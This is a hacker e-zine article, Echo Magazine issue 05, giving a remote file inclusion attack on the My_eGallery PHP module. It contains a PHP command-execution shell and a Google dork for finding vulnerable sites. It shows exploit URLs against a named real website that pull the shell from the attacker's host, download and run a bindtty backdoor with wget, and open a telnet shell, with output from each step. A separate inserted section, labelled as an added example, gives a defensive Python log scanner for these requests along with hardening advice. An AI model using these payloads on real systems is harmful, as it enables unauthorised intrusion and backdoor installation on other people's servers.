
Echo Magazine Issue 05 Phile 0x006

Published in Echo Magazine


____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/


.OR.ID
ECHO-ZINE RELEASE
05

Author: juventini || juventini@kalteng.net
Online @ www.echo.or.id :: http://ezine.echo.or.id

My_eGallery Injection
=====================
By: juventini

This bug may be a bit old, but I swear there's still plenty we can
play with hehhe.. (that's what Google is for, right). The bug is in
"My_eGallery"; basically it happens when the "intruder" supplies a
parameter (in the form of PHP code) to the target's My_eGallery site
from the "intruder's" own web site.

=====Start PHP Code=========

<?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
print_output();
?>

==========End===============

Well.. let's give it a try (here's where the interesting part starts..
hehehe). First, upload that PHP code to your site (it can be a .txt).
Or if you're lazy you can grab it from
http://www.geocities.com/java_sas/pascal.txt
Ok.. now let's open my favourite site "www.google.com" (found most
everything here!!), then enter the keyword: allinurl:my_eGallery site:.com
(.com can be swapped for whatever you like: .net, .id, .tv, etc)...
The result...!!! lots of them, right.. hehehe

Let's get our tools ready.. what do we need? Just a browser, Explorer
or Netscape :) simple, right? Once that's done, let's take the URL we
got from Google earlier and combine it with the location of the PHP
code on our site:

http://www.clontarfhc.com/modules/My_eGallery/public/displayCategory.php?
basepath=http://www.geocities.com/java_sas/pascal.txt?&cmd=uname%20-a

let's examine it first:
*http://www.clontarfhc.com/modules/My_eGallery/public/displayCategory.php
= is the target site and the directory where my_eGallery lives

*http://www.geocities.com/java_sas/pascal.txt = is the intruder's site
where we stored the PHP code earlier
*cmd=uname%20-a = do I really have to tell you? hehehehe

ok, let's see what the browser produces from that URL:

Linux server1.fastsecurehost.com 2.4.22-1.2174.nptlsmp #1 SMP Wed Feb 18
16:21:50 EST 2004 i686 i686 i386 GNU/Linux
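As an added example (not part of the original zine article), here is a defender-side Python script that scans web-server access logs for the request shape shown above: a `basepath` (or any other) parameter carrying a remote URL, the trailing `?` that is appended to that URL, and shell metacharacters in a `cmd` value. The log lines, IP addresses and hostnames in it are constructed placeholders, not taken from the article.

```python
"""
Detect remote-file-inclusion (RFI) attempts, such as the My_eGallery
basepath= injection discussed above, in web-server access logs.

Added example; not part of the original article.  All log lines, IPs and
hostnames below are constructed for illustration.
"""
import re
from typing import Dict, List
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (Apache common log format).
SAMPLE_LOG = """\
203.0.113.5 - - [18/Feb/2004:04:22:42 -0500] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://attacker.example/shell.txt?&cmd=uname%20-a HTTP/1.0" 200 512
203.0.113.5 - - [18/Feb/2004:04:22:43 -0500] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://attacker.example/shell.txt?&cmd=cd%20/var/tmp%20;%20wget%20evil.example/tool HTTP/1.0" 200 1024
198.51.100.7 - - [18/Feb/2004:04:25:10 -0500] "GET /modules/My_eGallery/public/displayCategory.php?basepath=/var/www/html/modules/My_eGallery HTTP/1.0" 200 8192
198.51.100.9 - - [18/Feb/2004:04:26:00 -0500] "GET /index.php?page=gallery HTTP/1.0" 200 2048
"""

# One access-log line: client IP, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# A parameter value that would make PHP's include()/require() fetch code
# from another host instead of the local filesystem.
REMOTE_SCHEME_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)
# PHP stream wrappers that can also feed include() attacker-controlled code.
WRAPPER_RE = re.compile(r'^(php://|data:)', re.IGNORECASE)
# Shell separators that only make sense if the value reaches a shell.
SHELL_META_RE = re.compile(r'[;|`]|&&|\$\(')


def inspect_request(target: str) -> List[str]:
    """Return human-readable indicators found in one request target (path+query)."""
    reasons: List[str] = []
    parsed = urlsplit(target)
    for name, value in parse_qsl(parsed.query, keep_blank_values=True):
        if REMOTE_SCHEME_RE.match(value):
            reasons.append(f"{name}: remote URL supplied as include path")
            # A trailing '?' turns whatever the application appends
            # (e.g. "/index.php") into a query string on the remote fetch.
            if value.endswith("?"):
                reasons.append(f"{name}: trailing '?' neutralises server-side path suffix")
        elif WRAPPER_RE.match(value):
            reasons.append(f"{name}: PHP stream wrapper in include path")
        if SHELL_META_RE.search(value):
            reasons.append(f"{name}: shell metacharacters in value")
    return reasons


def scan_log(text: str) -> List[Dict[str, object]]:
    """Parse every log line and collect those that show RFI indicators."""
    findings: List[Dict[str, object]] = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # not a recognised access-log line
        reasons = inspect_request(match.group("target"))
        if reasons:
            findings.append({
                "ip": match.group("ip"),
                "time": match.group("time"),
                "path": urlsplit(match.group("target")).path,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['time']} {finding['ip']} {finding['path']}")
        for reason in finding["reasons"]:
            print(f"    - {reason}")
```

Run as a script it prints the two flagged requests and leaves the legitimate local-path request alone. Logging catches the attempt after the fact; the fix on the server is to never build an include path from request input, and on PHP 5.2 or later to set `allow_url_include = Off` (on older PHP, `allow_url_fopen = Off`), which stops include() from fetching code over HTTP regardless of what the parameter holds.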
waaaaaaaaaaaaaaaaa.. hehehe the command got executed..!! Now, to make
it more interesting, how about we upload "bindtty" to the target site so
we can telnet in :)

http://www.clontarfhc.com/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/java_sas/pascal.txt?&cmd=cd%20/var/tmp%20;%20wget%20www.renjana.ws/~toa/bindtty

note: cmd=cd%20/var/tmp%20;%20wget%20www.renjana.ws/~toa/bindtty
since we're not root, writing files is usually allowed in the /var/tmp
directory, then just wget bindtty (here I took it from
www.renjana.ws/~toa/bindtty)
Look at what the browser shows:

--04:22:42-- http://www.renjana.ws/%7Etoa/bindtty
=> `bindtty'
Resolving www.renjana.ws... done.
Connecting to www.renjana.ws[66.111.56.80]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,380 [text/plain]

0K .......... ........ 100% 151.41 KB/s

04:22:43 (151.41 KB/s) - `bindtty' saved [19380/19380]

oops... it works :) halfway there already hehehe.. now that bindtty is
saved on the target site we only need to run it, but first of course we
change its permissions:

http://www.clontarfhc.com/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/java_sas/pascal.txt?&cmd=cd%20/var/tmp%20;%20chmod%20755%20bindtty

after this we can finally run the bindtty program:

http://www.clontarfhc.com/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/java_sas/pascal.txt?&cmd=cd%20/var/tmp%20;%20./bindtty

And in your browser you'll see the pid of that bindtty.. hehehe.. it's
running!! Now open telnet (I usually use PuTTY) and telnet to the target
site on port 4000 (since the bindtty from www.renjana.ws/~toa/bindtty is
set to port 4000)
It's much nicer over telnet.. hehehe
$bash id
uid=99(nobody) gid=99(nobody) groups=99(nobody)
next....? that's up to you... heheehhehe

That's all from me for now.. happy adventuring!!!

Author: juventini
Email: juventini@kalteng.net
Greetz to: My "Lovely" Girl (cit`z), all my "Tentor" (scut, pupet, etc),
all echo staff,
all my friends @Dalnet (aXal, mujie, Sitoboyan, C007, Banzai, etc), everybody
who knows me..!!
